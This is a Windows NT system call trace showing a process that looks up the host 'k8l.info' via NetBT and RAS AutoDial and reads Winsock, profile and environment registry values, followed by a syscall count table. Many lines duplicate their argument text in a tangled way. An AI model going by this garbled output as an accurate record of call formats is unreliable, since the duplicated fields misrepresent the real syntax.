 04852   712   NtCreateFile  (0x20100000, {24, 0, 0x40, 0, 0,  (0x20100000, {24, 0, 0x40, 0, 0, "\Device\NetBT_Tcpip_{D19DF882-A9CB-4144-8307-5C0D0368DE1A}"}, 0x0, 0, 3, 3, 0, 0, 0, ... ) }, 0x0, 0, 3, 3, 0, 0, 0, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04853   712   NtClose  (684, ... ) == 0x0
 04854   712   NtCreateEvent  (0x1f0003, 0x0, 0, 1, ... 684, ) == 0x0
 04855   712   NtDeviceIoControlFile  (688, 684, 0x0, 0x0, 0x210096,  (688, 684, 0x0, 0x0, 0x210096, "\0\0\0\0\0\0\0\0K8L.INFO       \0", 24, 1160, ... {status=0x1779d8, info=1311096}, "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0B\5\373\0\0\0\0\0X\273\27\0x\1\24\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", ) , 24, 1160, ... {status=0x1779d8, info=1311096},  (688, 684, 0x0, 0x0, 0x210096, "\0\0\0\0\0\0\0\0K8L.INFO       \0", 24, 1160, ... {status=0x1779d8, info=1311096}, "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0B\5\373\0\0\0\0\0X\273\27\0x\1\24\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", ) , ) == 0x103
 04856   712   NtWaitForMultipleObjects  (1, (684, ), 1, 0, 0x0, ...
 03843   676   NtWaitForSingleObject  ... ) == 0x102
 04857   676   NtQuerySystemTime  (... {242484718, 29873142}, ) == 0x0
 04858   676   NtWaitForSingleObject  (496, 1, {-1, 2147483647}, ...
 04856   712   NtWaitForMultipleObjects  ... ) == 0x0
 04859   712   NtClose  (684, ... ) == 0x0
 04860   712   NtOpenKey  (0x2000000, {24, 48, 0x40, 0, 0,  (0x2000000, {24, 48, 0x40, 0, 0, "System\CurrentControlSet\Services\WinSock2\Parameters"}, ... 684, ) }, ... 684, ) == 0x0
 04861   712   NtQueryValueKey  (684,  (684, "WinSock_Registry_Version", Partial, 144, ... TitleIdx=0, Type=1, Data="2\0.\00\0\0\0"}, 20, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (684, "WinSock_Registry_Version", Partial, 144, ... TitleIdx=0, Type=1, Data="2\0.\00\0\0\0"}, 20, ) }, 20, ) == 0x0
 04862   712   NtQueryValueKey  (684,  (684, "WinSock_Registry_Version", Partial, 144, ... TitleIdx=0, Type=1, Data="2\0.\00\0\0\0"}, 20, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (684, "WinSock_Registry_Version", Partial, 144, ... TitleIdx=0, Type=1, Data="2\0.\00\0\0\0"}, 20, ) }, 20, ) == 0x0
 04863   712   NtQueryValueKey  (684,  (684, "AutodialDLL", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04864   712   NtClose  (684, ... ) == 0x0
 04865   712   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "rasadhlp.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04866   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\rasadhlp.dll"}, 24703004, ... ) }, 24703004, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04867   712   NtQueryAttributesFile  ({24, 112, 0x40, 0, 0,  ({24, 112, 0x40, 0, 0, "rasadhlp.dll"}, 24703004, ... ) }, 24703004, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04868   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\rasadhlp.dll"}, 24703004, ... ) }, 24703004, ... ) == 0x0
 04869   712   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\rasadhlp.dll"}, 5, 96, ... 684, {status=0x0, info=1}, ) }, 5, 96, ... 684, {status=0x0, info=1}, ) == 0x0
 04870   712   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 684, ... 692, ) == 0x0
 04871   712   NtQuerySection  (692, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 04872   712   NtClose  (684, ... ) == 0x0
 04873   712   NtMapViewOfSection  (692, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x76fc0000), 0x0, 20480, ) == 0x0
 04874   712   NtClose  (692, ... ) == 0x0
 04875   712   NtCreateFile  (0x3, {24, 0, 0x40, 0, 0,  (0x3, {24, 0, 0x40, 0, 0, "\Device\RasAcd"}, 0x0, 128, 3, 3, 0, 0, 0, ... 692, {status=0x0, info=0}, ) }, 0x0, 128, 3, 3, 0, 0, 0, ... 692, {status=0x0, info=0}, ) == 0x0
 04876   712   NtCreateEvent  (0x1f0003, 0x0, 1, 0, ... 684, ) == 0x0
 04877   712   NtDeviceIoControlFile  (692, 684, 0x0, 0x0, 0xf14014,  (692, 684, 0x0, 0x0, 0xf14014, "\3\0\0\0k8l.info\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 1552, 0, ... ) , 1552, 0, ... ) == STATUS_UNSUCCESSFUL
 04878   712   NtClose  (684, ... ) == 0x0
 04879   712   NtClose  (692, ... ) == 0x0
 04880   712   NtWaitForSingleObject  (448, 0, 0x0, ... ) == 0x0
 04881   712   NtWaitForSingleObject  (452, 0, 0x0, ... ) == 0x0
 04882   712   NtReleaseMutant  (452, ... 0x0, ) == 0x0
 04883   712   NtQueryValueKey  (376,  (376, "EnableAutodial", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (376, "EnableAutodial", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 04884   712   NtQueryValueKey  (376,  (376, "NoNetAutodial", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (376, "NoNetAutodial", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 04885   712   NtOpenEvent  (0x100000, {24, 0, 0x0, 0, 0,  (0x100000, {24, 0, 0x0, 0, 0, "\INSTALLATION_SECURITY_HOLD"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04886   712   NtOpenThreadToken  (-2, 0xc, 1, ... ) == STATUS_NO_TOKEN
 04887   712   NtFsControlFile  (660, 609, 0x0, 0x0, 0x11c017,  (660, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0\32\0\0\0\16\0\0\0\2\0\0\0\1\0\0\0\1\0", 26, 1024, ... {status=0x103, info=48}, "\5\0\2\3\20\0\0\00\0\0\0\15\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", ) , 26, 1024, ... {status=0x103, info=48},  (660, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0\32\0\0\0\16\0\0\0\2\0\0\0\1\0\0\0\1\0", 26, 1024, ... {status=0x103, info=48}, "\5\0\2\3\20\0\0\00\0\0\0\15\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", ) , ) == 0x103
 04888   712   NtCreateKey  (0x2001d, {24, 48, 0x40, 0, 0,  (0x2001d, {24, 48, 0x40, 0, 0, "Software\Microsoft\RAS AutoDial"}, 0, 0x0, 0, ... 692, 2, ) }, 0, 0x0, 0, ... 692, 2, ) == 0x0
 04889   712   NtCreateKey  (0x20019, {24, 692, 0x40, 0, 0,  (0x20019, {24, 692, 0x40, 0, 0, "Default"}, 0, 0x0, 0, ... 684, 2, ) }, 0, 0x0, 0, ... 684, 2, ) == 0x0
 04890   712   NtClose  (692, ... ) == 0x0
 04891   712   NtQueryValueKey  (684,  (684, "DefaultInternet", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04892   712   NtClose  (684, ... ) == 0x0
 04893   712   NtOpenThreadToken  (-2, 0xc, 1, ... ) == STATUS_NO_TOKEN
 04894   712   NtOpenProcessToken  (-1, 0xc, ... 684, ) == 0x0
 04895   712   NtReleaseSemaphore  (416, 1, ... 0, ) == 0x0
 04896   712   NtWaitForSingleObject  (416, 0, {0, 0}, ... ) == 0x0
 04897   712   NtClose  (684, ... ) == 0x0
 04898   712   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Connections\Pbk\"}, 3, 16417, ... 684, {status=0x0, info=1}, ) }, 3, 16417, ... 684, {status=0x0, info=1}, ) == 0x0
 04899   712   NtQueryDirectoryFile  (684, 0, 0, 0, 24702028, 616, BothDirectory, 1,  (684, 0, 0, 0, 24702028, 616, BothDirectory, 1, "<.pbk", 0, ... ) , 0, ... ) == STATUS_NO_SUCH_FILE
 04900   712   NtClose  (684, ... ) == 0x0
 04901   712   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\Ras\"}, 3, 16417, ... 684, {status=0x0, info=1}, ) }, 3, 16417, ... 684, {status=0x0, info=1}, ) == 0x0
 04902   712   NtQueryDirectoryFile  (684, 0, 0, 0, 24702028, 616, BothDirectory, 1,  (684, 0, 0, 0, 24702028, 616, BothDirectory, 1, "<.pbk", 0, ... ) , 0, ... ) == STATUS_NO_SUCH_FILE
 04903   712   NtClose  (684, ... ) == 0x0
 04904   712   NtOpenThreadToken  (-2, 0xc, 1, ... ) == STATUS_NO_TOKEN
 04905   712   NtOpenProcessToken  (-1, 0xc, ... 684, ) == 0x0
 04906   712   NtQueryInformationToken  (684, User, 64, ... {token info, class 1, size 36}, 36, ) == 0x0
 04907   712   NtOpenKey  (0x2001f, {24, 124, 0x40, 0, 0,  (0x2001f, {24, 124, 0x40, 0, 0, "S-1-5-21-1078081533-484763869-839522115-1003"}, ... 692, ) }, ... 692, ) == 0x0
 04908   712   NtCreateKey  (0x2000000, {24, 692, 0x40, 0, 0,  (0x2000000, {24, 692, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"}, 0, 0x0, 0, ... 696, 2, ) }, 0, 0x0, 0, ... 696, 2, ) == 0x0
 04909   712   NtClose  (692, ... ) == 0x0
 04910   712   NtQueryValueKey  (696,  (696, "AppData", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\0\0"}, 74, ) , Partial, 144, ... TitleIdx=0, Type=2, Data= (696, "AppData", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\0\0"}, 74, ) }, 74, ) == 0x0
 04911   712   NtAllocateVirtualMemory  (-1, 0, 0, 1, 4096, 4, ... 24969216, 4096, ) == 0x0
 04912   712   NtQueryVirtualMemory  (-1, 0x17d0000, Basic, 28, ... {BaseAddress=0x17d0000,AllocationBase=0x17d0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04913   712   NtQueryVirtualMemory  (-1, 0x17d0000, Basic, 28, ... {BaseAddress=0x17d0000,AllocationBase=0x17d0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04914   712   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows NT\CurrentVersion\ProfileList"}, ... 692, ) }, ... 692, ) == 0x0
 04915   712   NtQueryValueKey  (692,  (692, "ProfilesDirectory", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0S\0y\0s\0t\0e\0m\0D\0r\0i\0v\0e\0%\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\0\0"}, 86, ) , Partial, 144, ... TitleIdx=0, Type=2, Data= (692, "ProfilesDirectory", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0S\0y\0s\0t\0e\0m\0D\0r\0i\0v\0e\0%\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\0\0"}, 86, ) }, 86, ) == 0x0
 04916   712   NtClose  (692, ... ) == 0x0
 04917   712   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows NT\CurrentVersion\ProfileList"}, ... 692, ) }, ... 692, ) == 0x0
 04918   712   NtQueryValueKey  (692,  (692, "AllUsersProfile", Partial, 144, ... TitleIdx=0, Type=1, Data="A\0l\0l\0 \0U\0s\0e\0r\0s\0\0\0"}, 32, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (692, "AllUsersProfile", Partial, 144, ... TitleIdx=0, Type=1, Data="A\0l\0l\0 \0U\0s\0e\0r\0s\0\0\0"}, 32, ) }, 32, ) == 0x0
 04919   712   NtClose  (692, ... ) == 0x0
 04920   712   NtQueryVirtualMemory  (-1, 0x17d0000, Basic, 28, ... {BaseAddress=0x17d0000,AllocationBase=0x17d0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04921   712   NtOpenKey  (0x1, {24, 48, 0x40, 0, 0,  (0x1, {24, 48, 0x40, 0, 0, "System\CurrentControlSet\Control\Session Manager\Environment"}, ... 692, ) }, ... 692, ) == 0x0
 04922   712   NtQueryKey  (692, Full, 176, ... {LastWrite={0x7838d13c,0x1c73999}, TitleIdx=0, Subkeys=0, Values=12, Class=""}, 44, ) == 0x0
 04923   712   NtQuerySecurityObject  (692, 7, 0, ... ) == STATUS_ACCESS_DENIED
 04924   712   NtEnumerateValueKey  (692, 0, Full, 220, ... TitleIdx=0, Type=2, Name= (692, 0, Full, 220, ... TitleIdx=0, Type=2, Name="ComSpec", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0s\0y\0s\0t\0e\0m\03\02\0\\0c\0m\0d\0.\0e\0x\0e\0\0\0"}, 96, ) , Data= (692, 0, Full, 220, ... TitleIdx=0, Type=2, Name="ComSpec", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0s\0y\0s\0t\0e\0m\03\02\0\\0c\0m\0d\0.\0e\0x\0e\0\0\0"}, 96, ) }, 96, ) == 0x0
 04925   712   NtEnumerateValueKey  (692, 1, Full, 220, ... TitleIdx=0, Type=2, Name= (692, 1, Full, 220, ... TitleIdx=0, Type=2, Name="Path", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0s\0y\0s\0t\0e\0m\03\02\0;\0%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0;\0%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0W\0b\0e\0m\0\0\0"}, 152, ) , Data= (692, 1, Full, 220, ... TitleIdx=0, Type=2, Name="Path", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0s\0y\0s\0t\0e\0m\03\02\0;\0%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0;\0%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0W\0b\0e\0m\0\0\0"}, 152, ) }, 152, ) == 0x0
 04926   712   NtEnumerateValueKey  (692, 2, Full, 220, ... TitleIdx=0, Type=2, Name= (692, 2, Full, 220, ... TitleIdx=0, Type=2, Name="windir", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\0\0"}, 58, ) , Data= (692, 2, Full, 220, ... TitleIdx=0, Type=2, Name="windir", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\0\0"}, 58, ) }, 58, ) == 0x0
 04927   712   NtEnumerateValueKey  (692, 3, Full, 220, ... TitleIdx=0, Type=1, Name= (692, 3, Full, 220, ... TitleIdx=0, Type=1, Name="OS", Data="W\0i\0n\0d\0o\0w\0s\0_\0N\0T\0\0\0"}, 46, ) , Data= (692, 3, Full, 220, ... TitleIdx=0, Type=1, Name="OS", Data="W\0i\0n\0d\0o\0w\0s\0_\0N\0T\0\0\0"}, 46, ) }, 46, ) == 0x0
 04928   712   NtQueryVirtualMemory  (-1, 0x17d0000, Basic, 28, ... {BaseAddress=0x17d0000,AllocationBase=0x17d0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04929   712   NtEnumerateValueKey  (692, 4, Full, 220, ... TitleIdx=0, Type=1, Name= (692, 4, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_ARCHITECTURE", Data="x\08\06\0\0\0"}, 72, ) , Data= (692, 4, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_ARCHITECTURE", Data="x\08\06\0\0\0"}, 72, ) }, 72, ) == 0x0
 04930   712   NtQueryVirtualMemory  (-1, 0x17d0000, Basic, 28, ... {BaseAddress=0x17d0000,AllocationBase=0x17d0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04931   712   NtEnumerateValueKey  (692, 5, Full, 220, ... TitleIdx=0, Type=1, Name= (692, 5, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_LEVEL", Data="1\05\0\0\0"}, 58, ) , Data= (692, 5, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_LEVEL", Data="1\05\0\0\0"}, 58, ) }, 58, ) == 0x0
 04932   712   NtQueryVirtualMemory  (-1, 0x17d0000, Basic, 28, ... {BaseAddress=0x17d0000,AllocationBase=0x17d0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04933   712   NtEnumerateValueKey  (692, 6, Full, 220, ... TitleIdx=0, Type=1, Name= (692, 6, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_IDENTIFIER", Data="x\08\06\0 \0F\0a\0m\0i\0l\0y\0 \01\05\0 \0M\0o\0d\0e\0l\0 \04\0 \0S\0t\0e\0p\0p\0i\0n\0g\0 \08\0,\0 \0G\0e\0n\0u\0i\0n\0e\0I\0n\0t\0e\0l\0\0\0"}, 154, ) , Data= (692, 6, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_IDENTIFIER", Data="x\08\06\0 \0F\0a\0m\0i\0l\0y\0 \01\05\0 \0M\0o\0d\0e\0l\0 \04\0 \0S\0t\0e\0p\0p\0i\0n\0g\0 \08\0,\0 \0G\0e\0n\0u\0i\0n\0e\0I\0n\0t\0e\0l\0\0\0"}, 154, ) }, 154, ) == 0x0
 04934   712   NtQueryVirtualMemory  (-1, 0x17d0000, Basic, 28, ... {BaseAddress=0x17d0000,AllocationBase=0x17d0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04935   712   NtEnumerateValueKey  (692, 7, Full, 220, ... TitleIdx=0, Type=1, Name= (692, 7, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_REVISION", Data="0\04\00\08\0\0\0"}, 66, ) , Data= (692, 7, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_REVISION", Data="0\04\00\08\0\0\0"}, 66, ) }, 66, ) == 0x0
 04936   712   NtQueryVirtualMemory  (-1, 0x17d0000, Basic, 28, ... {BaseAddress=0x17d0000,AllocationBase=0x17d0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04937   712   NtEnumerateValueKey  (692, 8, Full, 220, ... TitleIdx=0, Type=1, Name= (692, 8, Full, 220, ... TitleIdx=0, Type=1, Name="NUMBER_OF_PROCESSORS", Data="1\0\0\0"}, 64, ) , Data= (692, 8, Full, 220, ... TitleIdx=0, Type=1, Name="NUMBER_OF_PROCESSORS", Data="1\0\0\0"}, 64, ) }, 64, ) == 0x0
 04938   712   NtQueryVirtualMemory  (-1, 0x17d0000, Basic, 28, ... {BaseAddress=0x17d0000,AllocationBase=0x17d0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04939   712   NtEnumerateValueKey  (692, 9, Full, 220, ... TitleIdx=0, Type=1, Name= (692, 9, Full, 220, ... TitleIdx=0, Type=1, Name="PATHEXT", Data=".\0C\0O\0M\0;\0.\0E\0X\0E\0;\0.\0B\0A\0T\0;\0.\0C\0M\0D\0;\0.\0V\0B\0S\0;\0.\0V\0B\0E\0;\0.\0J\0S\0;\0.\0J\0S\0E\0;\0.\0W\0S\0F\0;\0.\0W\0S\0H\0\0\0"}, 134, ) , Data= (692, 9, Full, 220, ... TitleIdx=0, Type=1, Name="PATHEXT", Data=".\0C\0O\0M\0;\0.\0E\0X\0E\0;\0.\0B\0A\0T\0;\0.\0C\0M\0D\0;\0.\0V\0B\0S\0;\0.\0V\0B\0E\0;\0.\0J\0S\0;\0.\0J\0S\0E\0;\0.\0W\0S\0F\0;\0.\0W\0S\0H\0\0\0"}, 134, ) }, 134, ) == 0x0
 04940   712   NtQueryVirtualMemory  (-1, 0x17d0000, Basic, 28, ... {BaseAddress=0x17d0000,AllocationBase=0x17d0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
NtCancelTimer(>)	1	NtGdiSaveDC(>)	2	NtReleaseSemaphore(>)	5	NtQueryDebugFilterState(>)	37
NtCreatePort(>)	1	NtGdiSetDIBitsToDeviceInternal(>)	2	NtRegisterThreadTerminatePort(>)	6	NtRequestWaitReplyPort(>)	37
NtCreateProcessEx(>)	1	NtLockFile(>)	2	NtSetInformationObject(>)	6	NtUserGetClassInfo(>)	37
NtCreateTimer(>)	1	NtOpenDirectoryObject(>)	2	NtTestAlert(>)	6	NtUnmapViewOfSection(>)	38
NtDelayExecution(>)	1	NtOpenSymbolicLinkObject(>)	2	NtWaitForMultipleObjects(>)	6	NtQueryDirectoryFile(>)	40
NtFindAtom(>)	1	NtQueryEvent(>)	2	NtCreateThread(>)	7	NtSetInformationFile(>)	47
NtGdiBitBlt(>)	1	NtQueryInstallUILanguage(>)	2	NtFreeVirtualMemory(>)	7	NtUserFindExistingCursorIcon(>)	49
NtGdiCreateCompatibleBitmap(>)	1	NtQueryPerformanceCounter(>)	2	NtResumeThread(>)	7	NtFlushInstructionCache(>)	52
NtGdiCreateDIBitmapInternal(>)	1	NtQuerySymbolicLinkObject(>)	2	NtSetInformationThread(>)	7	NtQueryDefaultLocale(>)	54
NtGdiCreatePatternBrushInternal(>)	1	NtQuerySystemTime(>)	2	NtUserCallNoParam(>)	7	NtSetInformationProcess(>)	55
NtGdiExtGetObjectW(>)	1	NtRemoveIoCompletion(>)	2	NtContinue(>)	9	NtCreateEvent(>)	57
NtGdiInit(>)	1	NtUnlockFile(>)	2	NtDuplicateObject(>)	9	NtCreateKey(>)	58
NtGdiQueryFontAssocInfo(>)	1	NtUserGetProcessWindowStation(>)	2	NtSetEvent(>)	9	NtUserRegisterClassExWOW(>)	65
NtOpenKeyedEvent(>)	1	NtUserGetThreadDesktop(>)	2	NtOpenMutant(>)	10	NtCreateSection(>)	68
NtQueryInformationJobObject(>)	1	NtUserSetProp(>)	2	NtUserGetWindowDC(>)	10	NtQueryInformationProcess(>)	69
